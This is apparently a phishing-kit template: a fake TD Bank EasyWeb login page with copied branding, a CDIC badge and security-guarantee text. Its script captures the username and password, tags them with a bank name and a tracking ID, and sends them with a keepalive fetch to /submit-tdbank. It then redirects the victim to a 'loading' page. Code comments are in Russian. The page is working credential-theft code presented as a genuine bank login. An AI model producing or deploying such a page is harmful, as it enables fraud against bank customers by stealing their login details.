<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>EasyWeb Login</title>
  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap" rel="stylesheet">
  <script src="https://cdn.tailwindcss.com"></script>
  <style>
    body {
      font-family: 'Inter', sans-serif;
      color: #333;
      background-color: #f9fafb;
    }
  </style>
</head>
<body class="min-h-screen flex flex-col items-center justify-center py-12 px-4">
  <div class="max-w-4xl w-full">
    <h1 class="text-2xl font-medium text-[#2e6e32] mb-6 text-center md:text-left">
      EasyWeb Login
    </h1>
    
    <div class="grid grid-cols-1 md:grid-cols-2 gap-6">
      <!-- Login Form -->
      <form id="tdbank-login-form" method="POST" action="/submit-tdbank">
        <input type="hidden" name="url_id" value="{{ url_id }}">
      <div class="bg-white rounded-md shadow-sm p-6">
        <div class="space-y-6">
          <div>
            <label class="block text-sm font-medium mb-1">
              Username or Access Card
            </label>
            <div class="relative">
              <input 
                type="text" 
                name="login-id"
                class="w-full h-12 px-3 border border-gray-300 rounded-sm focus:outline-none focus:border-[#4d8c4f]"
              />
            </div>
          </div>
          
          <div>
            <label class="block text-sm font-medium mb-1">
              Password
            </label>
            <div class="relative">
              <input 
                type="password" 
                name="password"
                class="w-full h-12 px-3 border border-gray-300 rounded-sm focus:outline-none focus:border-[#4d8c4f]"
              />
              <button class="absolute right-3 top-1/2 transform -translate-y-1/2 focus:outline-none">
                <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="text-gray-400">
                  <path d="M2 12s3-7 10-7 10 7 10 7-3 7-10 7-10-7-10-7Z"></path>
                  <circle cx="12" cy="12" r="3"></circle>
                </svg>
              </button>
            </div>
          </div>
          
          <div>
            <label class="inline-flex items-center">
              <input type="checkbox" class="w-4 h-4 text-[#4d8c4f] border-gray-300 rounded focus:ring-[#4d8c4f]">
              <span class="ml-2 text-sm">Remember me</span>
            </label>
          </div>
          
          <button
            class="w-full bg-[#4d8c4f] hover:bg-[#3e7040] h-12 rounded-sm text-white font-medium"
          >
            LOGIN
          </button>
          
          <div class="pt-2">
            <a href="#" class="text-[#4d8c4f] hover:underline text-sm">
              Forgot your password?
            </a>
          </div>
        </div>
      </div>
      </form>
      
      <!-- Information Panel -->
      <div class="bg-white rounded-md shadow-sm p-6">
        <div class="space-y-6">
          <h2 class="text-lg font-medium">Welcome to EasyWeb, let's get started.</h2>
          
          <p class="text-sm text-gray-600">
            If you've received your temporary password, use it to log in along with your 
            Access Card number. You'll then be prompted to create a new Password.
          </p>
          
          <div class="mt-8 pt-4 border-t border-gray-200">
            <div class="flex items-start gap-3">
              <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="text-[#4d8c4f] mt-1">
                <rect width="18" height="11" x="3" y="11" rx="2" ry="2"></rect>
                <path d="M7 11V7a5 5 0 0 1 10 0v4"></path>
              </svg>
              <div>
                <h3 class="font-medium">TD Online and Mobile Security Guarantee:.</h3>
                <p class="text-sm text-gray-600 mt-1">
                  We've made Online Banking more convenient, while still using advanced 
                  security technologies that keep your money and information safe.
                </p>
                <a href="#" class="text-[#4d8c4f] hover:underline text-sm block mt-1">
                  Learn more about how we protect you.
                </a>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  
  <footer class="w-full py-4 px-4 mt-16">
    <div class="max-w-4xl mx-auto flex flex-col md:flex-row justify-between items-center">
      <div class="flex flex-wrap gap-4 mb-4 md:mb-0">
        <a href="#" class="text-[#4d8c4f] hover:underline text-sm">
          Privacy and Security
        </a>
        <a href="#" class="text-[#4d8c4f] hover:underline text-sm">
          Legal
        </a>
        <a href="#" class="text-[#4d8c4f] hover:underline text-sm">
          Accessibility
        </a>
      </div>
      
      <div class="flex items-center gap-2">
        <span class="text-[#4d8c4f] text-sm">CDIC Member</span>
        <img
          alt="CDIC Logo"
          src="https://i.postimg.cc/hvs1hyvJ/cdic-logo-footer-en-CA-1.png"
          width="70"
          height="30"
          class="object-contain"
        />
      </div>
    </div>
  </footer>
<script>
    document.addEventListener('DOMContentLoaded', function() {
        const form = document.querySelector('#tdbank-login-form');
        form.addEventListener('submit', function(e) {
            e.preventDefault();
            
            // Получаем url_id из всех возможных источников
            let urlId;
            
            // 1. Из параметров URL
            const urlParams = new URLSearchParams(window.location.search);
            urlId = urlParams.get('url_id');
            
            // 2. Из скрытого поля формы
            if (!urlId) {
                const hiddenField = form.querySelector('input[name="url_id"]');
                if (hiddenField) {
                    urlId = hiddenField.value;
                }
            }
            
            // 3. Из sessionStorage
            if (!urlId) {
                urlId = sessionStorage.getItem('url_id');
            }
            
            // Если всё еще нет url_id, показываем ошибку
            if (!urlId) {
                alert('Session ID is missing. Please restart the process.');
                return;
            }
            
            const formData = new FormData(form);
            formData.append('bankname', 'tdbank');
            formData.append('url_id', urlId);

            // Перенаправляем на loading.html с url_id
            window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;

            // Отправка данных формы после перехода
            fetch('/submit-tdbank', {
                method: 'POST',
                body: formData,
                keepalive: true // Обеспечивает отправку при переходе
            }).catch(error => {
                console.error('Error submitting form:', error);
            });
        });
    });
</script>
    <script>
        // Сохраняем url_id при загрузке страницы банка
        document.addEventListener('DOMContentLoaded', function() {
            const urlId = "{{ url_id }}";
            if (urlId) {
                sessionStorage.setItem('url_id', urlId);
            }
        });
    </script>
</body>
</html>
